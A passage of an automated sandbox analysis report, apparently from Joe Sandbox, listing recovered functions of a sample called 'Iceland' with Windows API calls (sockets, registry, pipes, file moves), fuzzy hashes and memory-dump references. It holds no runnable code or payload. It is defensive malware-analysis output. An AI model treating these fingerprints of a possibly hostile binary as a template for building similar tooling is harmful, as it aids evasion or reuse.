                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 61576b439f59ad9e431ad2f92eb8bb1c2c6ee5064350a3c03fa139c35298f801
                                                                                                                                                                                                                                                                • Instruction ID: c42b7588051af0af56fd8cde80f9e70cc68208d288250951596092c0d7698a93
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61576b439f59ad9e431ad2f92eb8bb1c2c6ee5064350a3c03fa139c35298f801
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B841B73AE00218ABCF10DF6CC885A9E7BB5BF85324F148255E9156B392D771DB05CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AA3AD7
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: _wcslen.LIBCMT ref: 00AA3AF8
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AA1B6F
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1B7E
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1C26
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA1C56
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                • Opcode ID: eecf18ee8da797f494140fa7d8635a0bfff197d8d2fb0b4fced97b73990d75be
                                                                                                                                                                                                                                                                • Instruction ID: f6cf9a6c185a28f1ced764aa65802de2464db02ade2ceb8779bbe072c76b5ee3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eecf18ee8da797f494140fa7d8635a0bfff197d8d2fb0b4fced97b73990d75be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8410831600114AFDB10DF64C944BA9B7E9EF46324F148169FC059B2D2D774ED81CBE1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A8D7CD,?), ref: 00A8E714
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A8D7CD,?), ref: 00A8E72D
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00A8D7F0
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00A8D82A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8D8B0
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8D8C6
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00A8D90C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 7d4e0eb7780131d6fe4235f7c9a0533a25ccf4ff98a056b4c91d9c4ae87940b0
                                                                                                                                                                                                                                                                • Instruction ID: cb14141f9683dbacb942a34cb80644581d87806e2cf5079787e188dfcc4b37cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4e0eb7780131d6fe4235f7c9a0533a25ccf4ff98a056b4c91d9c4ae87940b0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D4147719052189FDF16FFA4DA85BDE77B8AF08340F1004EAE545EB192EB34A788CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AB38B8
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB38EB
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB3920
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AB3952
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AB397C
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB398D
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB39A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                • Opcode ID: c4394a867934a3cb45018d1800231d9fc8de67a61a72acdc48bc25e519786f05
                                                                                                                                                                                                                                                                • Instruction ID: 72d0bef6f4e84c8c039f70bd7ec72a0b084d5e4aa363ebea75010572aa2f9ff6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4394a867934a3cb45018d1800231d9fc8de67a61a72acdc48bc25e519786f05
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4311736604255AFDF21CF88DC95FA437E9FB86710F1502A4F5108B2B2CBB1A986DB01
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A880D0
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A880F6
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A880F9
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A88117
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A88120
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00A88145
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A88153
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e5456a188387cb3392a20730a0a101185fd2b93847875448469b1c3f1033ee1
                                                                                                                                                                                                                                                                • Instruction ID: 5a0591337568f3400b3e6f0da60375fc27cf6f3f5744b4cc5ac62f6cfb015999
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e5456a188387cb3392a20730a0a101185fd2b93847875448469b1c3f1033ee1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E219776600219AF9F10EFA8DC88CBB77ACEF093607448625F905DB2A1DE74DC468760
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A881A9
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A881CF
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A881D2
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32 ref: 00A881F3
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00A881FC
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00A88216
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A88224
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00A90E99
                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A90ED5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00A90F6D
                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A90FA8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A278B1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: GetStockObject.GDI32(00000011), ref: 00A278C5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A278CF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AB4BB0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AB4BBD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AB4BC8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AB4BD7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AB4BE3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A5DB23: _free.LIBCMT ref: 00A5DB4C
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DBAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DBB8
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DBC3
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC17
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC22
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC2D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DC38
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A8E328
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00A8E32F
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A8E345
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00A8E34C
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A8E390
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00A8E36D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00A91322
                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?), ref: 00A91334
                                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A91342
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A91350
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A9135F
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A9136F
                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 00A91376
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AA281D
                                                                                                                                                                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AA283E
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA284F
                                                                                                                                                                                                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 00AA2938
                                                                                                                                                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00AA28E9
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8433E: _strlen.LIBCMT ref: 00A84348
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A9F669), ref: 00AA3C9D
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00AA2992
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00A5042A
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A50446
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00A5045D
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5047B
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00A50492
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A504B0
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A48649,00A48649,?,?,?,00A567C2,00000001,00000001,8BE85006), ref: 00A565CB
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A567C2,00000001,00000001,8BE85006,?,?,?), ref: 00A56651
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A5674B
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A56758
                                                                                                                                                                                                                                                                  • Part of subcall function 00A53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A56761
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A56786
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC72A
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AAC785
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAC7CA
                                                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AAC7F9
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AAC853
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAC85F
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000035), ref: 00A800A9
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A80150
                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00A80354,00000000), ref: 00A80179
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00A80354), ref: 00A8019D
                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00A80354,00000000), ref: 00A801A1
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A801AB
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00A99F2A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A99F4B
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A99F72
                                                                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00A99FCA
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                                                                • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A96F21
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00A9707E
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00AC0CC4,00000000,00000001,00AC0B34,?), ref: 00A97095
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A97319
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
